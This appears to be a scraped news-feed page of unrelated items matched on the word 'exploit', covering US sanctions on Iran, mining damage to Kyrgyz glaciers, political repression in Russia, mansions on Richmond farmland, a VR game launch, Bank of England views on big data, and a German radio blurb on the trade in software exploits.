Iranian Foreign Minister Mohammad Javad Zarif took to YouTube on Tuesday to dismiss US sanctions and Washington’s demands of change from Tehran as “absurd, unlawful and fundamentally flawed” and maintained the Trump administration would come to “regret this unwise move.”

“The US administration appears to believe that imposing draconian sanctions on Iran will bring about such pain to our nation that it will force us to submit to its will,” Zarif said in a video message, posted in English and Persian.

“We have weathered difficult times in the face of 40 years of American hostility relying solely on our own resources, and today we and our partners across the globe will ensure that our people are least affected by this indiscriminate assault,” he said.

Washington’s decision to scrap the multi-nation nuclear deal with Iran and reimpose sanctions — with the last tranche hitting on Monday — was “pushing it further into global isolation,” Zarif claimed.
Did Trump Blink on Iran Sanctions?
When Donald Trump pulled the United States out of the Iran nuclear deal in May of this year, he vowed that America would re-impose all the sanctions on Tehran that had been lifted by the pact championed by President Barack Obama.

That promise will be kept on November 5, as a deadline is reached for nations that need to cease importing Iranian goods or face serious financial penalties. It will impose sanctions on more than 700 businesses, government agencies, and individuals in Iran involved in oil, banking, shipping, shipbuilding, and insurance. That will tighten the noose that has been gradually choking the Iranian economy since Trump took office and began the process of dismantling his predecessor’s pact.

But there are two key elements of the announcement made by Secretary of State Mike Pompeo that are troubling to those who have been applauding the president’s intentions to scrap a deal that enriched and empowered an enemy nation bent on hegemony in the Middle East, and failed to end the threat of an Iranian nuclear weapon. Far from being a sweeping ban on trade with Iran, the new sanctions keep open some significant loopholes.

One is that the administration has granted an exemption to eight unidentified countries, allowing them to continue to do business with Iran. One is believed to be India, a major trading partner of Tehran.

Also notably absent from the announcement was any mention of America’s determination to ensure that any nation or entity that conducts business with Iran will be cut off from the US-based Society for Worldwide Interbank Financial Telecommunication or SWIFT, which facilitates international transactions. If it had been included in the sanctions, that would essentially compel anyone interested in commerce with Iran to choose between money to be made with Iran or being able to do business in the United States, as well as any other entity that has interactions with US banks. That would have imposed a blanket of complete isolation on Iran.

What happened?
US permits activity at 3 Iran nuclear sites, even as sanctions renewed
The United States said Monday it was issuing waivers to allow the continuation of a nuclear deal with Iran, after declaring the agreement a disaster and slapping sweeping sanctions.

Hours after sanctions went into effect that ban most trade with Iran, the State Department said it was exempting projects set up through the 2015 nuclear deal negotiated under former president Barack Obama.

The international activities at Bushehr, Iran’s only nuclear power station, as well as the Fordow enrichment plant and the Arak heavy water reactor will be allowed “to continue under the strictest scrutiny to ensure transparency and maintain constraints on Iran,” the State Department said in a statement.

“This oversight enhances our ability to constrain Iran’s program and keep pressure on the regime while we pursue a new, stronger deal,” it said.

The State Department said the waivers were “temporary,” without specifying a timeframe, and “conditional on the cooperation of the various stakeholders.”

The 2015 agreement promised that world powers would assist Iran in developing civilian nuclear energy — the clerical regime’s stated goal for its atomic program.
EU struggles to find host for new Iran trade mechanism
The European Union has so far failed to find a country to host a special mechanism to trade with Iran and circumvent the newly reimposed U.S. sanctions that went into effect Monday, according to three EU diplomats, who said European governments fear being targeted by U.S. countermeasures.

The EU on Monday reissued its Nov. 2 statement, saying it was still setting up the so-called "special purpose vehicle," or SPV, which is designed to circumvent the sanctions.

The EU, which opposes the sanctions, had hoped to have the SPV ready by the time the sanctions came into force.

However, no EU country has so far volunteered to host the entity, the diplomats said. Several states have been asked by EU foreign policy chief Federica Mogherini to consider hosting the SPV headquarters, as the bloc tries to uphold the nuclear accord from which U.S. President Donald Trump withdrew in May.

While the European Commission declined to comment on Monday, European Economic Affairs Commissioner Pierre Moscovici said that "the European Union does not approve" of the reimposition of U.S. sanctions, which were lifted under the 2015 nuclear deal.
Erdogan: US Iran sanctions are aimed at ‘upsetting global balance’
Turkish President Recep Tayyip Erdogan on Tuesday hit out at new sanctions on Iran imposed by the administration of US President Donald Trump, saying they were aimed at upsetting the global balance and against international law.

Washington on Monday renewed sanctions on the Islamic republic that aim to isolate the country’s banking sector and slash its oil exports. Turkey was one of eight countries exempted from the demand to stop buying Iranian oil.

“We don’t find the (Iran) sanctions appropriate,” Erdogan was quoted as saying by the state-run Anadolu news agency.

“Because to us, they are aimed at upsetting the global balance,” he added. “They are against international law and diplomacy. We don’t want to live in an imperial world.”

Erdogan’s comments came after his Foreign Minister Mevlut Cavusoglu warned that isolating Iran was “dangerous.”
U.S. Embassy Jerusalem: The Iranian Regime Protects Itself
As the new round of sanctions against the Iranian regime goes into effect, regime officials are lying about the targets and consequences. The sanctions exempt humanitarian goods such as medicine and food, but the regime chooses to allow suffering among its people for political and financial purposes.






We have lots of ideas, but we need more resources to be even more effective. Please donate today to help get the message out and to help defend Israel.
          Military Intelligence - U.S. Army - Cheyenne, WY      Cache   Translate Page      
Supervises and conducts investigations, collections and operations to detect, identify, counter, exploit and neutralize adversarial, Foreign Intelligence... $43,000 - $50,000 a year
From Indeed - Mon, 01 Oct 2018 16:31:39 GMT - View all Cheyenne, WY jobs
          Are Kyrgyzstan’s glaciers under threat? This ecologist thinks so      Cache   Translate Page      

The Central Asian state’s Tian Shan mountain range isn’t just home to shrinking glaciers. It’s also the site of an international mining operation.

Kumtor. Image: Kalia Moldogazieva. Kumtor is an open-cast gold mining site in Kyrgyzstan’s Central Tian Shan mountain system, situated in the mountains' central permafrost massif which reaches heights of 3800-4400 metres above sea level. Commercial exploitation at Kumtor began in 1997. The site is 100% owned by the Canadian gold-mining company Centerra Gold, which manages it through its subsidiaries, the Kumtor Gold Company (KGK) and the Kumtor Operating Company (KOK). Kyrgyzstan, in its turn holds roughly 33% of shares in the company through its OJSC Kyrgyzaltyn Joint Stock Company. The gold reserves at Kumtor are assessed as amounting to 716.21 tonnes, of which 316.57 are in open cast mines and 399.64 underground.

We asked Kyrgyz ecologist Kaliya Moldogaziyeva to tell us about the environmental threat to the area from the mining operations at Kumtor, the new amendments to Kyrgyzstan’s Water Code and the future of the region’s water resources. Moldogaziyeva worked with state commissions on issues concerning Kumtor in 2005 and 2012, and was deputy head of an interagency commission on the same subject in 2011.

Could you explain to us how activity at the Kumtor mine affects Kyrgyzstan’s water resources?

The Kumtor mine is situated at the sources of the Arabel and Kumtor river system, in an area at the centre of the glacier and river runoff of Central Asia’s most important waterway, the Naryn river, which flows into the Syr Darya.

The mining site includes a quarry, a gold-processing plant and other infrastructure elements. The mining is an open-cast operation, with 14-17 tonnes of explosives used daily, and the ore is processed using cyanides.

The mining is an open-cast operation, with 14-17 tonnes of explosives used daily

The construction of the mine workings contravened Kyrgyz law from the very beginning. At the first stage of the work, KOK management started dumping waste on the Davydov glacier, which was forbidden under Rule No.79 of the country’s Unified Safety Regulations and its law “On Water”. More than a billion tonnes of rock have been removed from the quarry and dumped, as well as 77 million cubic metres of glacial mass – the equivalent of 60 billion litres of glacial water.

The volume of dumped rock and cyano-containing tailings in the tailing storage areas will grow, and all this dumped material will remain forever in the headwaters of the Naryn river, requiring continual monitoring and technical maintenance, even after the closure of the mine, which is slated for 2026.

Why were amendments made to Kyrgyzstan’s water code at the end of 2017?

These amendments, and their connection to the Kumtor glaciers, was raised by the government as early as 2015. But the MPs didn’t manage to push it through as several members of the working party on additions to the code, of which I was one, resolutely opposed it. And thanks to this active opposition by experts and environmental activists, the amendments weren’t adopted. The question of more scheduled amendments to the code was raised again in September 2017 after the signing of a new agreement between the Kyrgyzstan government and Centerra, one paragraph of which talks about:

“The full and conclusive mutual release and settlement of all existing arbitration and environmental claims, disputes, investigations and court decisions, as well as the release of the Company and its daughter subsidiaries from future claims on the same grounds as the existing environmental claims resulting from approved activity”.

In other words, this agreement sidelines the whole question of compensation for the environmental damage caused by the company over the many years of mining at Kumtor, as well as the destruction of the Davydov and Lysy glaciers.

The adoption of amendments to the Water Code, for the benefit of a single company, became the next step towards Kyrgyzstan’s legal abandonment of any claims for environmental damage caused by Centerra earlier. The adoption of amendments permitting work on the glaciers because of the mine’s strategic importance is an indulgence that allows the entire Davydov and Lysy glaciers to be destroyed without a kopeck being paid in compensation. On 16 November 2017, the Jogorku Kenesh, the Kyrgyz parliament, ratified the amendments to the water codes, according to Article 62 of which:

Any activity affecting the speeding up of the glacial melting, using coal, ash, oils or other substances or materials that could affect the state of the glaciers or the quality of the water contained in them, as well as activity connected with ice harvesting, other than on the Davydov and Lysy glaciers, is forbidden. These exceptions do not apply to previous operations on these glaciers.

But perhaps the glaciers are melting because of global warming, and not the mining operations?

Experts engaged by the Kyrgyzstan government are indeed arguing that glaciers are melting all over the world and that the Kumtor glaciers would have melted by themselves. No one, however, has mentioned the fact that the rocks overlying the gold-containing ores were stored on the glaciers to a height of 90 and 120 metres and mixed with them, so the meltwaters already contained sulphates, heavy metals and other toxic substances that got into the waterways. This was confirmed by the conclusions of the Kumtor State Commission (2012-2013) on which I worked: the concentration of toxic substances in sediments had indeed increased.

Environmental protection laws, and in particular the “Law on Water” and the “Unified Safety Regulations” have been being infringed since the start of the construction of the Kumtor mine. Glacier No. 359 in the Catalogue of Glaciers of the USSR was completely destroyed, while most of the Davydov Glacier was ruined when the mine was already in operation. The situation is now under control, but by the end of operations there, there will be 1.7 billion tonnes of waste, mixed with glacial masses, and all the problems will lie at the door of Kyrgyzstan’s government and population.

Looking ten years ahead, we will see a reduction in water resources because of global warming, and theses resources will, in addition, be irreversibly polluted, and no injection of government funds will be adequate to the task of removing the polluting substances.

What is the Kyrgyz government doing to conserve the water resources at Kumtor for the future?

Government ministers have been insisting that without the legal amendments, Kumtor will turn into a catastrophe. But it was the systematic infringement of environmental protection legislation during mining operations that has caused the present state of affairs. And instead of demanding that the company clean up its act, our highest government officials and heads of key national agencies propose legitimising these irregularities.

Jeopardising Kyrgyzstan’s water resources for the sake of extracting mineral deposits is short-sighted. Meanwhile, according to the law “On Strategic Objects of the Kyrgyzstan Republic”, structures pertaining to water management and waterworks, including glaciers, natural lakes, river, hydro engineering structures, reservoirs, dams and pumping stations are all considered Strategic Objects of the country. In the case in question, the Kyrgyzstan Republic’s government and parliament are ignoring this law. Centerra’s environmental report for 2016 includes a statement to the effect that the company and its subsidiary KGK don’t consider that the water code applies to the Kumtor project. The corporation, in other words, is laying down the law to the Kyrgyzstan government and parliament.

Government ministers have been insisting that without the legal amendments, Kumtor will turn into a catastrophe

This same government has created and promulgated a National Strategy for Sustainable Development (NSUD). Section 4.3 of this project for 2018-2040 (Environmental Safety and Adaptation to Climate Change) states, among other things, that “Kyrgyzstan’s natural resources and biosphere are the rare and unique property of its people; sustainability should therefore be the main criterion for all developmental measures and policies.”

This same strategy plan quotes World Bank data stating that the countries of Central Asia will be the second most affected world region in terms of glacier loss, including the loss of the Tian-Shan glaciers in Kyrgyzstan. The effect of the economic activity in mineral management and agriculture, as well as hunting and poaching, environmental pollution and lack of ecological accountability could all add up to an irreversible state of affairs. The new legal framework has created a basis for environmental protection and the conservation of the glaciers. But while mouthing the national strategy for sustainable development and the importance of environmental safety and compliance and the conservation of the glaciers, our government is changing the law and, among other things, introducing amendments in the water code which will allow the destruction of the glaciers at the Kumtor mine.

Even the Kyrgyzstan national anthem talks about the mountain glaciers bequeathed to us by our forebears:

“The high peaks blanketed in snow-white glaciers,
The valleys, the source of life for our people
Were preserved over many ages
By our ancestors in the Ala-Too Mountains”.

What is Kyrgyz civil society doing to stop the amendments going through?

In November 2017, then president Almazbek Atambayev signed off the “Law on Amendments to the Kyrgyzstan Republic’s Water Code”, passed by the Jogorku Kenesh after three readings, although members of the public sent him an open letter asking him not to sign that particular draft. Independent experts and civil society campaigners are still engaged in trying to have the amendment revoked. The “Democracy and Civil Society Coalition” NGO even brought legal action against the Jogorku Kenesh, on the grounds that parliamentary regulations were breached when the amendments were passed; there was no quorum and MPs voted for one another, which is forbidden when a law is being adopted. Its case was however thrown out by the courts.

A group of rights campaigners and environmental specialists is supporting the Coalition. After a consultation with me and ecologist Oleg Pechenyuk , the NGO sent a request to the Jogorku Kenesh to have an analysis of all the requisites of the draft law and its regulatory implications carried out. They received a reply: there has been an expert appraisal of its legal implications, but nothing about appraisals in terms of the ecological, civil and human rights, gender, anti-corruption implications which are required when laws are being passed. The amendments have obviously contained numerous irregularities. The Coalition is continuing to work on its legal case.

Ecologist Gulnura Beleyeva and I are intending to work with the environmental protection community to raise awareness of the work being carried out by the campaigning group and to develop an action plan for the future. It is essential to have the previous version of the water code reinstated, without the exceptions allowing the destruction of the glaciers that are an important source of water not only for Kyrgyzstan but for the whole of Central Asia.

 

Sideboxes
Rights: 
CC by 4.0

          Why Russia needs a grassroots campaign against political repression      Cache   Translate Page      

Political repression is ramping up in Russia, but a network of people ready to stand against it is yet to emerge.

Riot police surround people during a demonstration against Vladimir Putin in Moscow, on 5 May 2018. Photo: NurPhoto / SIPA USA / PA Images. All rights reserved.2018, a presidential election year in Russia, has become a year of increasing repressions. In February, details of the “Network case” – in which 11 Russian anarchists and anti-fascists are being investigated on charges of creating a terrorist organisation – became public. This organisation never existed, and even its name is a figment of an FSB officer’s imagination. The number of criminal cases for reposting “extremist” memes online is only growing (OVD-Info reported 170 such cases in 2017), and this practice is developing quicker in the provinces than in the big cities. Recently, in the Siberian town of Barnaul, there have been three cases opened against users of social networks.

The public campaign in support of people arrested in connection to the “Network case” started well, with several actions in different cities in Russia and across the world. But it has not moved beyond that. It is mainly human rights defenders, leftists and anarchists who are supporting these new political prisoners. Now it is time for a broader campaign against political repressions and fabricated criminal cases in Russia – a campaign that will go beyond individual cases, and that will go beyond solidarity based on personal sympathies towards this or that group of political prisoners.

Why do we think that it is time for a large-scale campaign?

Russian society’s understanding of repressions is changing, and it is changing visibly. Yes, the word “repressions” still has mainly historical connotations – something from the time of Stalinism, such as executions and deportations. But it is becoming more and more evident: imprisonment for reposting articles on social media, receiving five–seven years in prison for “thought-crimes” – this is the reality in Russia today, and it is not that far away from 10 years of prison camp for telling a joke or criticising the Stalinist bureaucracy.

The fact that a group of women from Moscow bohemian circles – actors, journalists, the head of a publishing house and a literary critic – consciously decided to organise an unsanctioned public protest (the “Mothers’ march”) to support two young women arrested in another fabricated case speaks volumes. These people, who were not ready to resist when Russian theatre director Kirill Serebrennikov was arrested, are now saying: “We know everything about how rallies are sanctioned. There is no time for playing games with authorities, we have to go out (and protest)”.

A pro-Serebrennikov protester near Basmanny Court in Moscow. Image: Youtube / Radio Svoboda. Some rights reserved.Our organisation, Socialist Alternative, has waited for this change in consciousness and warned: in moments of political upheaval (and a new cycle of upheaval is clearly on the rise after the announcement of the pension reform and VAT rise), these changes can overshadow the analysis and actions of more permanent political forces and organisations.

Even the highly popular Russian rapper Oxxxymiron wrote some words in support of Maria Motuznaya, the Barnaul resident accused of “offending the feelings of believers” on social media. The rapper, who has always had a good sense of his audience, didn’t shy from political comment: “There are more and more such ‘crimes’ without any victims. Nobody is killed, or beaten up, or even personally offended… There are enough articles in the Criminal Code penalising direct calls to violence. Articles 282 and 148 (which penalise “extremism” and “offending religious feelings”) are superfluous… and are becoming an instrument of repression.”

The other side of this debate is represented by the regime’s media lackeys. For instance, Margarita Simonyan, editor-in-chief of RT, spoke out in her traditional genre of “your protests are evil, and there are normal people who among the cannibals (in power)”.

“The general public does not know that it was the consistent personal intervention of those (normal) people which helped to free those who were unjustly imprisoned, whom we have cried for at different times,” wrote Simonyan, without naming a single person. “But if I understand anything about the mechanics of the system, what is certainly not going to help is an unsanctioned rally.”

And this is what is terrible: after the long years of growing authoritarianism in Russia, many people are intuitively ready to self-censor. “Yes, injustice and controlled courts are all around us, but perhaps in this particular case we can free one particular individual from the claws of the ‘justice system’, if we are quiet and agree to play by the cannibals’ rules.”

As an organisation, we have witnessed different protest movements in our country. Those of them that tried to distance themselves from politics did not achieve anything, and their participants were eventually demoralised.

Only a year ago, we took part in a campaign to free journalist Ali Feruz, who faced deportation to Uzbekistan. Back then, activists also faced pressure – they were asked to stop street protests and were promised that “the case was already being resolved in the offices of power”. This pressure caused certain tensions between participants in the campaign, which is understandable. A threat “to make things worse” is the most vile trick to play on the friends and relatives of someone in prison – and the authorities use it.

A column in support of Ali Feruz at the 19 January anti-fascist march in memory of Stanislav Markelov and Anastasia Baburova. Photo CC BY 4.0: Dmitry Horov. Some rights reserved.But immediately when the campaign retreated, the case began to linger. In winter, after months of false promises, the most “radical” part of the campaign led by our organisation renewed public actions and brought a whole column in support of Ali Feruz to the annual anti-fascist march in Moscow on 19 January. Several days later, a court made a decision in favour of Ali. He is free now.

Who’s in charge here?

On 15 August, nearly a thousand people joined the “Mothers’ march” as they walked down Moscow’s central Tverskaya Street to the Russian Supreme Court in the rain. Participants carried toys, which they then left at the entrance to the court, where a spontaneous rally began with slogans as “Freedom”, “Freedom for political prisoners”, “We are in charge here”, “Children should not be thrown in prisons”.

Indeed, Toys became the symbol of the protest after an image of Anna Pavlikova, an 18-year-old facing extremism charges, with a unicorn began to circulate online. Pavlikova is one of those arrested in the fabricated “New Greatness” case – an organisation formed by FSB agents themselves so that they could later successfully uncover “an extremist group”. When she was arrested, Anna was not yet 18; later in pre-trial detention her health deteriorated, but the court refused to place her under house arrest. For many people who joined the action, the umpteenth extension of Anna’s detention at the beginning of August was the last drop – proof of the inhumane nature of Putin’s law enforcement system.

15 August, Mothers' March in Moscow. Source: Youtube / sotavision. This public protest was not sanctioned by the authorities, and the organisers did not buckle under pressure from police who visited some of them at home to “warn them against breaking the law”. The organisers were also not impressed by threats from pro-regime public figures, pro-regime media and even Anna Pavlikova’s lawyer who spoke against the march. Their decisiveness to carry the action out in spite of everything and the fact that more than 5,000 people joined the action’s Facebook group clearly scared the authorities – which are beginning to understand that threats are starting not to work and the situation is not under their control. People are not afraid to join unsanctioned actions anymore, which means that even bigger and angrier anti-government protests are coming.

A few hours before the march on 15 August, the Investigative Committee, hoping to decrease the number of protest participants, asked the court to release Anna Pavlikova and Maria Dubovik, another young suspect in the “New Greatness” case, under house arrest. The Prosecutor’s Office supported this move, and the Supreme Court, as it suddenly turned out, compelled the presidium of the Moscow City Court to consider a petition regarding Pavlikova’s arrest previously on 9 August. Such a U-turn in the rhetoric of the repressive apparatuses only encouraged the participants of the march: mass pressure from an action which had not yet taken place was already working.

Similar actions, in slightly different format, took place in other cities as well. In St Petersburg, relatives of people arrested in the “Network case” also organised pickets, showing that solidarity is our only weapon against repressions.

Kids in prison

There is a danger in these protests that we cannot ignore. The emotions of those protesting against the fact that “kids are in prison” are understandable. Their will to fight even more so. But devaluing the political beliefs of Anna Pavlikova, Maria Dubovik and other young people, who are now under pressure from the state, from a presumed “adult” perspective, is unacceptable. This is the other side of regime propaganda. They are trying to persuade us that these young people do not have their own views because they are kids.

Young people always feel injustice much more acutely than adults, who are protected by the armour of cynicism and routine. And when those adults swallow all the injustice of Putin’s regime, they are just showing young people how rotten the system is – in which evil is considered good, corrupted officials are called bureaucrats, where the lack of any future is concealed by experts on TV chatting about the country’s bright future, where billions are spent on the commercial show of the FIFA World Cup, while pensions are stolen and real salaries are much lower than propagandists’ feature stories.

Anna Pavlikova.Russian young people are getting politicised much quicker and are acting much more radically precisely because they are the conscience of the old world. Young people are put under all sorts of pressures to turn them into safe “experienced adults”. People who already have formed their political beliefs should not help the regime to achieve its goal of breaking the youth – even if their views are different from the views of young people. We should abolish the silly dichotomy of “adult/child”, express our solidarity with young people and fight together against repressions, poverty, discrimination and oppression.

In the “New Greatness” case, the FSB agent used the environment prepared by Putin’s policies to his advantage: he simply assembled those who were unhappy about the current situation in Russia and wanted to engage in political struggle. The very possibility of the provocation emerged because of the lack of transparent, genuinely democratic mass political organisations able to challenge the rotten regime openly.

These are the organisations that don’t offer “guerrilla”, “partisan struggle”, “revolutionary conspiracy”, “individual terror”, but mass mobilisation in the streets, the organisation of political committees in workplaces and at universities – unified actions in the struggle for higher salaries, pensions, scholarships, and against the commercialisation and destruction of the public system of education and health care. This is the kind of organisation we will have to build if we want to change everything.

Why it is always about politics

These shifts that we have described above are still not sufficient for the clear political positioning of a campaign against political repressions in Russia. The organisers of the “Mothers’ march” asked participants not to bring political placards, not to shout slogans and in general to avoid politics. We consider this a weak tactic. If we protest only out of our pity for those arrested in “New Greatness” case, but refuse to demand the immediate end of all political repressions and to understand their political reasons, we will lose.

The political reasons for this are as follows: under the conditions of economic crisis, big business cannot afford to share even a fraction of its super-incomes in the form of taxes, while the state budget is not sufficient for carrying out social obligations. The quality of life is decreasing, censorship and violence in suppressing protests are growing. Big business acts as a sponsor of repressions because it is the current regime acting in the interests of business that guarantees the possibility for continuous enrichment by exploiting the cheap labour of ordinary people – and, on top of that, transferring the costs of the economic crisis onto them. In recent years, the general population has become poorer and lost part of its social rights, while the number of billionaires is only growing.

Yes, we believe that, in addition to quota system within the security apparatuses, which encourages the enthusiasm of career-driven officers, repressions and censorship are directly connected to Russia’s economic crisis. They are connected to the rise of VAT (an attempt to transfer the costs of the crisis to ordinary employees), with the rise of the retirement age (the refusal of social obligations), with the rescue of private banks such as Otkrytie (instead of ordinary people affected by the crisis, for example, the holders of mortgages borrowed in foreign currency), with the rising petrol prices (a carte-blanche for the oil industry and again a transfer of crisis-caused losses to ordinary people). These are all links of the same chain: the regime that protects the interests of big business has prepared its police forces waiting for the wave of protests from below – a wave that is inevitable in the absence of any perspectives for the growth of the quality of life. These police forces are already unleashed on some people – usually those who have no one to protect them.

Most probably, this is a rehearsal of much crueler repressions in the light of the upcoming pension reform protests, which have not yet attained their full force.

Let us organise now before we all are arrested one by one

We believe that it is time to start a campaign against political repressions and fabricated criminal cases. A general campaign that will not focus on individuals only. We call upon leftist political and human rights organisations to set up a round table and an organising committee for such a campaign. We call for a permanent campaign with regular mass actions and the dissemination of information in the media. Such a campaign already has natural allies: the journalists of MediaZona and the experts of OVD-Info have already created the infrastructure of quick reporting on new crazy political processes.

The task of the campaign is to react, to create a stable network of supporters in different cities, to come to courts and rally in front of them, to organise actions at each turn of every important case, to organise stickers and leaflets at the local level. The campaign must also demand the abolition of Articles 148 and 282 of Russia’s Criminal Code. A person of any political beliefs if s/he is against repressions and censorship (and does not support repressions against political opponents – as the right often does) can join this campaign.

Calling for such a campaign, Socialist Alternative is nonetheless convinced that repressions will not stop under a capitalist state – they can only temporarily recede, since they are in the interests of the state. To end repressions, it is necessary to destroy their source: large-scale capital that sponsors them. It is necessary to socialise, under democratic control, the country’s largest economic sectors: oil and gas production, utilities, construction industry and so on. This will allow us to guarantee decent life for everyone and take power from the 1% who control everything now – big business and oligarchs who advance their interests, using millions created by our labour.

On their own, young people, students, people living from paycheck to paycheck will not be able to achieve this goal without their own party, independent from business and bureaucrats. Only if they are organised will they be able to fight for the democratic and socialist transformation of Russia and the whole world, which will end repression and exploitation.

 

Sideboxes
Rights: 
CC by NC 4.0

          Will Richmond City Council Scale Back Mansion Cropping on Best Farmland In Canada?      Cache   Translate Page      

Tuesday November 6 is a the mid-term election day in the USA but it is also a big day for the City of Richmond too, where the inaugural meeting of the new City Council will include looking at  residential development on agricultural land. 

And it’s not only Richmond under siege with mansion growing~it’s happening in California wine country too.

The last City of Richmond Council has been complicit in allowing the best agricultural lands in Canada supposedly protected under  the Agricultural Land Commission  to become private gated offshore owned estates.

The previous Council against the advice of their own staff endorsed the building of nearly 11,000 square foot mcmansions on farming lands.  That Council also allowed larger farm properties to not only have a huge house, but an additional 3,200 square foot house for the “help”.

The Province has capped housing at 5,382 square feet, and for a good reason, to ensure that land was kept for farming, and that farmers always had access to farmland. Using loopholes in existing legislation offshore buyers can escape paying the foreign buyers’ tax by purchasing agricultural lands, and developers get supernormal landlifts by turning farmland into private exclusive residential estates. The loser? Future food security close to metro markets, and the fact that farmers will never ever be able to own this farmland.

The Napa Register  outlines that in California’s Napa Valley mcmansions are also being built on prime farmland in five and ten-acre parcels. These “mansions” are half the size of the ones that Richmond City Council approved, being only 17 rooms and 6,700 square feet. But again these estates have the same impact, paving  over prime farmland for private residential pools and activities.

Price Tags Vancouver has previously reported that the exploitation of farmland for quick developer profit may be over. A majority of council (including returning Mayor Malcolm Brodie) are now working together to vote for   farmhouse size that is compliant with the Agricultural Land Commission’s guidelines.Scaling back to residential houses of 5,382 square feet gives agricultural land the chance to continue in farmland production as was intended. Price Tags will be watching on Tuesday to see Richmond City Council’s discussion and actions on keeping the best farmland in Canada in production for future generations.

Here’s a tweet from Councillor Harold Steves, a father of the Agricultural Land Reserve, farmer and environmentalist, as well as a long serving member of Richmond City Council on the impact of mansion cropping.

 

Read more »
          ARK Park est disponible      Cache   Translate Page      

ARK Park, l'aventure multijoueur en ligne sur le thème des dinosaures développée et publiée par Snail Games, est à présent disponible !


Nouveau titre de réalité virtuelle, ARK Park tire parti du monde de ARK: Survival Evolved (du Studio Wildcard) pour offrir aux propriétaires de PSVR une expérience de réalité virtuelle époustouflante. Basé sur le jeu ARK: Survival Evolved, ARK Park exploite au mieux le monde préhistorique gigantesque du jeu en le remplissant d'impressionnants dinosaures, de créatures anciennes et d'environnements détaillés, comprenant notamment des forêts tropicales, des prairies et des montagne.

Les joueurs qui achèteront ARK Park pourront également profiter du DLC gratuit Pterosaur Hill (mettant en avant les cartes « Crystal Sky », « Mountain Lake » et « Aviary »).

La technologie derrière ARK Park

La technologie VR moderne d'ARK Park permet aux joueurs d'explorer facilement le monde virtuel du jeu avec de nombreux commentaires visuels et audio. Le jeu exploite à la fois l’ambisonie de Wwise et la technologie RealSpace 3D Audio de VisiSonics pour capturer des sons ambiants extrêmement réalistes vous mettant rapidement en immersion.

Les scènes du monde réel ont été capturées avec précision lors de la construction de chaque environnement, comprenant les arbres, la végétation, les roches et la texture du terrain. Sous Unreal Engine 4, ce mélange d’images réelles et d’actifs 3D modifiables permet au jeu de se rapprocher au plus près de la réalité, offrant ainsi certains des visuels VR les plus naturels et les plus travaillés disponibles à ce jour.

Explorez le “Park”

En plus des environnements préhistoriques réalistes, ARK Park offre aux joueurs un jeu multijoueur interactif amusant comprenant exploration, la collecte et le combat à la première personne dans les phases d'action. Lorsque les joueurs entrent dans le parc pour la première fois, ils sont conduits et conseillés par le robot Joey, qui présente les nombreux systèmes du jeu (à commencer par l’élevage et la domestication de dinosaures) ! Puis, alors qu’une tour située à proximité est soudainement déconnectée, les joueurs doivent aider Joey à réparer la tour et défendre le parc, alors que ce dernier subit l’arrivée de dinosaures déchaînés.

Mise à jour des ventes

ARK Park s'est très bien vendu dans le monde entier depuis sa sortie en mars. Le jeu était le troisième titre PSVR le plus vendu au Japon, ce qui a poussé Snail Games à engager une sortie physique du jeu, suite aux demandes répétées de la communauté japonaise. De plus, ARK Park est épuisé à Hong Kong, Taiwan, Singapour et en Malaisie. Un certain nombre de YouTubers et de streamers populaires ont également mis le jeu en avant en partageant leurs aventures préhistoriques avec des millions de joueurs en ligne.

...
          Mapping the economy in real time is almost ‘within our grasp’       Cache   Translate Page      
 


Andy Haldane, BoE chief economist, says economists should embrace data flood
It should be said here that Andy Haldane also knows about Transfinancial Economics, and the notion of "mapping the economy in real time..." is clearly indicated in the following article. Though Big Data is part of the TFE Paradigm it is only part of the whole picture for a modern futuristic economics...  See   https://wiki.p2pfoundation.net/Transfinancial_Economics





The goal of mapping economic activity in real time, just as we do for weather or traffic, is “closer than ever to being within our grasp”, according to Andy Haldane, the Bank of England’s chief economist. In recent years, “data has become the new oil . . . and data companies have become the new oil giants”, Mr Haldane told an audience at King’s Business School earlier this month and released on Monday. But economics and finance have been “rather reticent about fully embracing this oil-rush”, partly because economists have tended to prefer a deductive approach that puts theory ahead of measurement. This needs to change, he said, because relying too much on either theory or real-world data in isolation can lead to serious mistakes in policymaking — as was seen when the global financial crisis exposed the “empirical fragility” of macroeconomic models.


 Parts of the private sector and academia have been far swifter to exploit the vast troves of ever-accumulating data now available — 90 per cent of which has been created in the last two years alone.  Massachusetts Institute of Technology’s “Billion Prices Project”, name-checked in Mr Haldane’s speech, now collects enough data from online retailers for its commercial arm to provide daily inflation updates for 22 economies. The Alan Turing Institute — the UK’s new national institute for data science — runs a programme, with funding from HSBC, which aims to use new data to measure economic activity faster and more precisely than was previously possible. National statisticians are taking tentative steps in the same direction. The UK’s Office for National Statistics — which has faced heavy criticism over the quality of its data in recent years — is experimenting with “web-scraping” to collect price quotes for food and groceries, for example, and making use of VAT data from small businesses to improve its output-based estimates of gross domestic product. In both cases, the increased sample size and granularity could bring considerable benefits on top of existing surveys, Mr Haldane said. The BoE itself is trying to make better use of financial data — for example, by using administrative data on owner-occupied mortgages to better understand pricing decisions in the UK housing market. Recommended Analysis UK politics & policy Starting gun prepped in race to replace Mark Carney at Bank of England Mr Haldane sees scope to go further with the new data coming on stream on payment, credit and banking flows. “Almost all economic activity leaves a financial footprint,” he said. “In time, it is possible that these sorts of data could help to create a real-time map of financial and activity flows across the economy, in much the same way as is already done for flows of traffic or information or weather.

Once mapped, there would then be scope to model and, through policy, modify these flows.” New data sources and techniques could also help policymakers think about human decision-making — which rarely conforms with the rational process assumed in many economic models. Data on music downloads from Spotify, used as an indicator of sentiment, has recently been shown to do at least as well as a standard consumer confidence survey in tracking consumer spending. “Why stop at music?” Mr Haldane asked. He saw potential to create a gaming environment “to explore behaviour in a virtual economy where players can spend or save, and one could test their reactions to monetary and regulatory policy intervention”.




File:Andy Haldane - Festival Economia 2013.JPG






















          L'exploit de Souffelweyersheim - Est Républicain      Cache   Translate Page      

L'exploit de Souffelweyersheim
Est Républicain
Devenez fan de notre page facebook du Sport en Lorraine et suivez notre compte twitter pour être informé de l'actualité sportive en Lorraine. Soyez le premier informé en vous inscrivant gratuitement à nos newsletters d'alerte et en téléchargeant notre ...

et plus encore »

          Digitale Verwundbarkeit - Das Geschäft mit Exploits      Cache   Translate Page      
Exploits sind Schwachstellen in Systemen. Sie sind in der Lage, Stromnetze, Wasserwerke und Atomkraftwerke lahmzulegen. Wie gefährdet ist unsere kritische Infrastruktur? Von Gabi Schlag und Benno Wenz
          Ambush Marketing Strategies      Cache   Translate Page      
